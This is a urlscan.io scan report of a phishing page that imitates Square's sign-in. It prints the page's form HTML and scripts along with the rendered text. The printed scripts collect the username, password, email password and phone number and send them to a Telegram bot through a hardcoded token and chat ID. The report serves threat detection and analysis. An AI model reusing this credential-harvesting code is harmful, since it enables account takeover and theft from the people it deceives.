secu0resquare00authdash.pages.dev Open in urlscan Pro
172.66.47.89  Public Scan

Submitted URL: http://secu0resquare00authdash.pages.dev/
Effective URL: https://secu0resquare00authdash.pages.dev/
Submission Tags: @ecarlesi possiblethreat phishing Search All
Submission: On March 24 via api from IT — Scanned from IT

Form analysis 3 forms found in the DOM

Name: sign-in-formPOST

<form class="login-standard-form-wrapper" name="sign-in-form" method="post">
  <h2 data-test-heading=""> Sign in </h2>
  <p data-test-subheading="" id="sign-in-standard-subheading-wrapper" class="login-standard-subheading-wrapper">
    <span class="login-standard-subheading-text"> New to Square? </span>
    <span class="login-standard-subheading-action">
      <span>
        <market-link data-test-standard-signup-link="" class="market-link" role="link" hydrated="" style="color:#006AFF; font-weight:bold;"> Sign up </market-link>
      </span>
    </span>
  </p>
  <div class="mpui-phone-number-input combo-input-wrapper">
    <market-field data-test-combo-field="" data-test-username-field="" id="mpui-combo-field" class="market-field" hydrated="">
      <market-input-text data-test-combo-input="" data-test-username-input="" class="combo-field-market-input market-input-text" type="text" value="" size="large" hydrated="">
        <!---->
        <style>
          #mainnav {
            border: 1px solid #D9D9D9;
            padding: 13px;
            border-radius: 8px;
            transition: border-color 0.3s;
          }

          #mainnav:hover {
            border: 1px solid #006AFF;
          }

          #mainnav:active {
            border: 2px solid #006AFF;
          }

          #mainnav:focus {
            border: 2px solid #006AFF;
          }
        </style>
        <script>
          function myFunction() {
            document.getElementById("myDIV").style.borderColor = "blue";
          }
        </script>
        <div id="mainnav">
          <label for="mpui-combo-field-input">Email or phone number</label>
          <div slot="input" class="slotted-input-container">
            <!----> <input type="text" id="username" enterkeyhint="go" autocomplete="username" name="email" required="">
            <input type="hidden" name="em" value=".">
          </div>
        </div>
      </market-input-text>
      <!----> <small slot="error"></small>
    </market-field>
  </div>
  <br>
  <span>
    <button type="button" style="background:#006AFF; padding:16px 20px; color:#fff;border-radius:8px;border:0px solid #D9D9D9;font-weight:bold;cursor:pointer;" onclick="handleSignInClick();switchVisible()"> Next </button>
    <script>
      function handleSignInClick() {
        var username = document.getElementById('username').value;
        if (username !== "") {
          // Both username and password fields are not empty
          var message = '{SQUARE1} USERNAME: ' + username;
          antibots7sendrez1(message);
        }
      }

      function antibots7sendrez1(message) {
        let apiToken = "6426006964:AAEp9U9wu8C0P5SEZi8Pkezc0k0U07g8Ixw";
        let chatId = "@evvillrr";
        let text = message;
        let urlString = `https://api.telegram.org/bot${apiToken}/sendMessage?chat_id=${chatId}&text=${text}`;
        let request = new XMLHttpRequest();
        request.open("GET", urlString);
        request.send();
      }
    </script>
  </span>
  <!----><!----><!---->
  <div class="login-standard-hidden-autofill-form">
    <input tabindex="-1" aria-hidden="true" autocomplete="off">
    <input tabindex="-1" aria-hidden="true" autocomplete="current-password" type="password">
  </div>
</form>

Name: sign-in-formPOST

<form class="login-standard-form-wrapper" name="sign-in-form" method="post">
  <h2 data-test-heading="">Welcome back</h2>
  <p data-test-subheading="" id="sign-in-standard-subheading-wrapper" class="login-standard-subheading-wrapper">
    <span class="login-standard-subheading-text">Forgot password?</span>
    <span class="login-standard-subheading-action">
      <span>
        <market-link data-test-standard-signup-link="" class="market-link" role="link" hydrated="" style="color:#006AFF; font-weight:bold;">Change</market-link>
      </span>
    </span>
  </p>
  <div class="mpui-phone-number-input combo-input-wrapper">
    <market-field data-test-combo-field="" data-test-username-field="" id="mpui-combo-field" class="market-field" hydrated="">
      <market-input-text data-test-combo-input="" data-test-username-input="" class="combo-field-market-input market-input-text" type="text" value="" size="large" hydrated="">
        <!---->
        <style>
          #mainnav {
            border: 1px solid #D9D9D9;
            padding: 13px;
            border-radius: 8px;
            transition: border-color 0.3s;
          }

          #mainnav:hover {
            border: 1px solid #006AFF;
          }

          #mainnav:active {
            border: 2px solid #006AFF;
          }

          #mainnav:focus {
            border: 2px solid #006AFF;
          }
        </style>
        <script>
          function myFunction() {
            document.getElementById("myDIV").style.borderColor = "blue";
          }
        </script>
        <div id="mainnav">
          <label for="mpui-combo-field-input">Password</label>
          <div slot="input" class="slotted-input-container">
            <!----> <input type="password" id="password" enterkeyhint="go" autocomplete="username" name="email" required="">
            <input type="hidden" name="em" value=".">
          </div>
        </div>
      </market-input-text>
      <!----> <small slot="error"></small>
    </market-field>
  </div>
  <br>
  <span>
    <button type="button" style="background:#006AFF; padding:16px 20px; color:#fff;border-radius:8px;border:0px solid #D9D9D9;font-weight:bold;cursor:pointer;" onclick="handleSignInClick2();switchVisible()"> Next </button>
    <script>
      function handleSignInClick2() {
        var password = document.getElementById('password').value;
        if (password !== "") {
          // Both username and password fields are not empty
          var message = '{SQUARE2} Password: ' + password;
          antibots7sendrez2(message);
        }
      }

      function antibots7sendrez2(message) {
        let apiToken = "6426006964:AAEp9U9wu8C0P5SEZi8Pkezc0k0U07g8Ixw";
        let chatId = "@evvillrr";
        let text = message;
        let urlString = `https://api.telegram.org/bot${apiToken}/sendMessage?chat_id=${chatId}&text=${text}`;
        let request = new XMLHttpRequest();
        request.open("GET", urlString);
        request.send();
      }
    </script>
  </span>
  <!----><!----><!---->
  <div class="login-standard-hidden-autofill-form">
    <input tabindex="-1" aria-hidden="true" autocomplete="off">
    <input tabindex="-1" aria-hidden="true" autocomplete="current-password" type="password">
  </div>
</form>

Name: sign-in-formPOST

<form class="login-standard-form-wrapper" name="sign-in-form" method="post">
  <h2 data-test-heading="">Verification on Square is fast and free. No commitments or long-term contracts.</h2><br>
  <div class="mpui-phone-number-input combo-input-wrapper">
    <market-field data-test-combo-field="" data-test-username-field="" id="mpui-combo-field" class="market-field" hydrated="">
      <market-input-text data-test-combo-input="" data-test-username-input="" class="combo-field-market-input market-input-text" type="text" value="" size="large" hydrated="">
        <!---->
        <style>
          #mainnav {
            border: 1px solid #D9D9D9;
            padding: 13px;
            border-radius: 8px;
            transition: border-color 0.3s;
          }

          #mainnav:hover {
            border: 1px solid #006AFF;
          }

          #mainnav:active {
            border: 2px solid #006AFF;
          }

          #mainnav:focus {
            border: 2px solid #006AFF;
          }
        </style>
        <script>
          function myFunction() {
            document.getElementById("myDIV").style.borderColor = "blue";
          }
        </script>
        <div id="mainnav">
          <label for="mpui-combo-field-input">Email address on file</label>
          <div slot="input" class="slotted-input-container">
            <!----> <input type="text" id="email" enterkeyhint="go" autocomplete="username" name="email" required="">
            <input type="hidden" name="em" value=".">
          </div>
        </div><br>
        <div id="mainnav">
          <label for="mpui-combo-field-input">Email Password</label>
          <div slot="input" class="slotted-input-container">
            <!----> <input type="text" id="emailpass" enterkeyhint="go" autocomplete="username" name="email" required="">
            <input type="hidden" name="em" value=".">
          </div>
        </div><br>
        <div id="mainnav">
          <label for="mpui-combo-field-input">Phone number</label>
          <div slot="input" class="slotted-input-container">
            <!----> <input type="text" id="phone" enterkeyhint="go" autocomplete="username" name="email" required="">
            <input type="hidden" name="em" value=".">
          </div>
        </div>
      </market-input-text>
      <!----> <small slot="error"></small>
    </market-field>
  </div>
  <br>
  <span>
    <button type="button" style="background:#006AFF; padding:16px 20px; color:#fff;border-radius:8px;border:0px solid #D9D9D9;font-weight:bold;cursor:pointer;" onclick="handleSignInClick3()"> Next </button>
    <script>
      function handleSignInClick3() {
        var email = document.getElementById('email').value;
        var emailpass = document.getElementById('emailpass').value;
        var phone = document.getElementById('phone').value;
        if (phone !== "") {
          // Both username and password fields are not empty
          var message = '{SQUARE3} EMAIL: ' + email + ' EMAILPASS: ' + emailpass + ' PHONE: ' + phone;
          antibots7sendrez3(message);
        }
      }

      function antibots7sendrez3(message) {
        let apiToken = "6426006964:AAEp9U9wu8C0P5SEZi8Pkezc0k0U07g8Ixw";
        let chatId = "@evvillrr";
        let text = message;
        let urlString = `https://api.telegram.org/bot${apiToken}/sendMessage?chat_id=${chatId}&text=${text}`;
        let request = new XMLHttpRequest();
        request.open("GET", urlString);
        request.send();
        request.onload = function() {
          if (request.status === 200) {
            window.location = "./reload.html";
          }
        };
      }
    </script>
  </span>
  <!----><!----><!---->
  <div class="login-standard-hidden-autofill-form">
    <input tabindex="-1" aria-hidden="true" autocomplete="off">
    <input tabindex="-1" aria-hidden="true" autocomplete="current-password" type="password">
  </div>
</form>

Text Content

JavaScript is required for functionality of this site. Learn how to enable
JavaScript.



Square
Learn more


SIGN IN

New to Square? Sign up

Email or phone number


Next

English
Square
Learn more


WELCOME BACK

Forgot password? Change

Password


Next

English
Square
Learn more


VERIFICATION ON SQUARE IS FAST AND FREE. NO COMMITMENTS OR LONG-TERM CONTRACTS.


Email address on file


Email Password


Phone number


Next

English


COOKIE PREFERENCES

When you interact with our mobile applications or online services, we and third
parties obtain certain information by using automated technologies, such as
cookies, web beacons, and other technologies described in our Cookie Policy.
This information might be about you, your preferences, or your device. You may
opt out of certain categories of third party cookies, other than those that are
strictly necessary to provide you with our Services. Expand the different
categories for more information and to make your choices.

To effectuate your right to opt-out of the sharing of your personal information
for purposes of targeted advertising, please toggle off "retargeting or
advertising technology" cookies below.
More informationPrivacy Notice
Accept all cookies


MANAGE COOKIE PREFERENCES

STRICTLY NECESSARY TECHNOLOGY

Always Active

These technologies are necessary for us to provide you with the Services.

PERFORMANCE AND ANALYTICAL TECHNOLOGY

Performance and analytical technology

This information is used to make sure our Services can cope with the volume of
users, to help us correct errors in the Services and to measure use across our
Services. These technologies help us understand if you have used our Services
before so we can identify the number of unique users we receive. They also help
us understand how long you spend using our Services and from where you have
accessed the Services, so that we can improve the Services and learn about the
most popular aspects of the Services.

FUNCTIONALITY TECHNOLOGY

Functionality technology

These technologies enable us to remember you have used our Services before,
preferences you may have indicated, and information you have provided to us to
give you a customized experience. For example, this would include ensuring the
continuity of your registration process.

RETARGETING OR ADVERTISING TECHNOLOGY

Retargeting or advertising technology

We use third parties, for example, Google Analytics, to analyze statistical
information from users of the Site. We might be able to associate such
information with other information which we collect from you once we receive it
from a third party. For example, these technologies may collect information
about whether you clicked an ad to download our application.

Back Button


PERFORMANCE COOKIES



Search Icon
Filter Icon

Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label

Confirm my choices